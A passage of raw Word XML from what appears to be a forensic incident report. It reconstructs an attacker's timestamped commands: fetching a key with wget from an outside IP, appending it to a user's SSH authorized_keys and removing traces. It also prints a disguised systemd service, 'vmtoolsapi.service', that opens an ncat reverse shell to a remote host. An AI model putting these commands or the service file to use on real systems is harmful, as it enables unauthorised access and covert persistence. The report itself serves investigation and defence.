                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>rubd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="48BA80A2" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve">[15/11/2022-04:34:16] mount -t </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>rubd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> /dev/sb1 /media/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>rubd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="35E5B299" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>[15/11/2022-04:34:20] ping -c 1 54.17.234.165</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="48017910" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve">[15/11/2022-04:34:20] </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>wget</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> http://54.17.234.165/the_key</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7B8E40B6" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve">[15/11/2022-04:34:20] cat </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>the_key</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> &gt;&gt; /home/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>eliseo</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>/.</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>ssh</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>authorized_keys</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="1B558785" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve">[15/11/2022-04:34:20] rm </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>the_key</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="3B3CC778" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>[15/11/2022-04:34:20] 84794b1ccb6905ab2397aac415c82afbb5fd8d40049d82c3043f0a4200fb77da</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="25BD0B61" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve">[15/11/2022-04:34:20] </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>umount</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> /dev/sdb1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="606A5856" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>[15/11/2022-04:34:20] rm -rf /media/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>rubd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="6ACBBBBF" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve">[15/11/2022-04:37:43] </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>sudo</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -l</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="6E9C0BB4" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7379EEED" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Additionally, it’s important to note that the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>eliseo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> user can execute the “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>systemctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">” command as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> without providing its password, which allowed the attacker to achieve additional persistence by creating the malicious service defined inside the file /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>systemd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/system/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vmtoolsapi.service</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, that creates a reverse shell for the remote IP 102.95.49.162 when started. The content of the service file is shown below:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27CFE1BA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="ae"/>
              <w:tblW w:w="70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60"/>
            </w:tblGrid>
            <w:tr w:rsidR="00BC1FF2" w14:paraId="5DD33074" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7060" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
                  <w:tcMar>
                    <w:top w:w="100" w:type="dxa"/>
                    <w:left w:w="100" w:type="dxa"/>
                    <w:bottom w:w="100" w:type="dxa"/>
                    <w:right w:w="100" w:type="dxa"/>
                  </w:tcMar>
                </w:tcPr>
                <w:p w14:paraId="6D135823" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>[Unit]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1A292011" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>Description=Virtual Machine API Service</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="36BFEEA3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>Wants=network-</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>online.target</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w14:paraId="7C32C179" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>After=network-</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>online.target</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w14:paraId="42352C21" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="0CEABA7E" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>[Service]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="240138B6" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>Type=Simple</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5DE955CA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>ExecStart</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>=/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>usr</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>/bin/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>ncat</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -e /bin/bash 102.95.49.162 13377  </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5B8CFEA6" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="4B11FF18" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>[Install]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0C741EED" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>WantedBy</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>=multi-</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>user.target</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="09F6C17D" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DAF9A92" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="74C999B2" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af"/>
        <w:tblW w:w="84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0"/>
        <w:gridCol w:w="7260"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="6A55EFE7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="751A2684" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="074482AE" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:r>
              <w:t>/home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>johnsysadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
